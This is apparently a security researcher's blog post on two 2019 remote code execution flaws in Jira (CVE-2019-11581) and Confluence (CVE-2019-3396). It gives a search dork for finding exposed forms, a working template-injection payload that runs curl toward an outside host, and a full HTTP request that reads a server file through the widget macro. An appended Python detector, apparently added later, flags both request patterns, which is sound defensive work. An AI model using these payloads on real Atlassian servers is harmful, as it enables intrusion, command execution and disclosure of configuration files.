Two Easy RCE in Atlassian Products

1. Jira Remote Code Execution in Contact Administrators form (CVE-2019-11581)

inurl:secure/ContactAdministrators!default.jspa
  1. Check from the dashboard page that your Jira instance supports the Contact Administrators form:
https://jira.example.com/secure/ContactAdministrators!default.jspa
  2. The test payload is a template expression that makes the server request a URL on your testing host:
$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('curl http://your-testing-server.com/rcetest?a=a').waitFor()
The issue is exploitable only if either:
  • an SMTP server has been configured in Jira and the Contact Administrators form is enabled; or
  • an SMTP server has been configured in Jira and an attacker has "JIRA Administrators" access.

2. Confluence Remote Code Execution via Widget Connector macro (CVE-2019-3396)

  1. First, this is an issue in the Widget Connector macro that can lead to RCE on the server. Check whether your Confluence version is still vulnerable to it; if it is, continue.
  2. The request that triggers the issue, with the _template macro parameter pointing at a file on the server:
POST /rest/tinymce/1/macro/preview HTTP/1.1
Referer: https://confluence.yourtarget.com/
Content-Type: application/json; charset=utf-8
Cookie: BIGipServerrb-p_cp-confluence_https_pool=!BUsntvn1os/4xuQWbHAsuN+1fsz22TIKPNFouw==; JSESSIONID=E3A43CEFE1932634CD80E301057C379D
Accept: */*
Accept-Encoding: gzip,deflate
Content-Length: 173
Host: confluence.yourtarget.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive

{"contentId":"123","macro":{"name":"widget","body":"","params":{"url":"https://www.youtube.com/watch?v=1","width":"200","height":"200","_template":"/WEB-INF/web.xml"}}}
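Detection logic for both request patterns above (the Jira Contact Administrators template expression and the Confluence widget macro preview with a _template parameter), as an added example that is not part of the original post. It assumes a simplified log record of method, path and request body; the sample records and the ContactAdministrators.jspa POST path are constructed.

```python
import json
import re

# Paths and patterns taken from the two requests shown in the post.
CONFLUENCE_PREVIEW_PATH = "/rest/tinymce/1/macro/preview"
JIRA_CONTACT_PATH = "/secure/ContactAdministrators"
# Template expressions that reach java.lang.Runtime by reflection, as in the Jira payload.
JIRA_TEMPLATE_RE = re.compile(r"\$\w+\.getClass\(\)\.forName\(|java\.lang\.Runtime", re.I)


def inspect_request(method, path, body):
    """Return a list of findings for one request (empty if nothing matches)."""
    findings = []
    if method.upper() != "POST":
        return findings
    if path.startswith(CONFLUENCE_PREVIEW_PATH):
        try:
            data = json.loads(body)
        except ValueError:
            return ["confluence macro preview: body is not valid JSON"]
        macro = data.get("macro") if isinstance(data, dict) else None
        params = macro.get("params") if isinstance(macro, dict) else None
        if isinstance(params, dict) and macro.get("name") == "widget" and "_template" in params:
            findings.append(f"CVE-2019-3396 pattern: widget macro _template={params['_template']!r}")
    elif path.startswith(JIRA_CONTACT_PATH) and JIRA_TEMPLATE_RE.search(body):
        findings.append("CVE-2019-11581 pattern: template expression in Contact Administrators body")
    return findings


def scan_log(lines):
    """Scan 'METHOD PATH BODY' records (assumed log format); return [(line_no, finding)]."""
    hits = []
    for n, line in enumerate(lines, 1):
        parts = line.split(" ", 2)
        if len(parts) < 2:
            continue
        body = parts[2] if len(parts) == 3 else ""
        hits.extend((n, f) for f in inspect_request(parts[0], parts[1], body))
    return hits


# Constructed sample records: a benign widget preview, the two patterns from the post, a plain GET.
SAMPLE_LOG = [
    'POST /rest/tinymce/1/macro/preview {"contentId":"123","macro":{"name":"widget","body":"","params":{"url":"https://www.youtube.com/watch?v=1"}}}',
    'POST /rest/tinymce/1/macro/preview {"contentId":"123","macro":{"name":"widget","body":"","params":{"url":"https://www.youtube.com/watch?v=1","_template":"/WEB-INF/web.xml"}}}',
    "POST /secure/ContactAdministrators.jspa subject=hi&details=$i18n.getClass().forName('java.lang.Runtime')",
    "GET /secure/ContactAdministrators!default.jspa",
]

if __name__ == "__main__":
    for n, finding in scan_log(SAMPLE_LOG):
        print(n, finding)
```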

I am a guy passionate about testing and security researching 👨‍💻 → t.me/valyaroller

Valeriy Shevchenko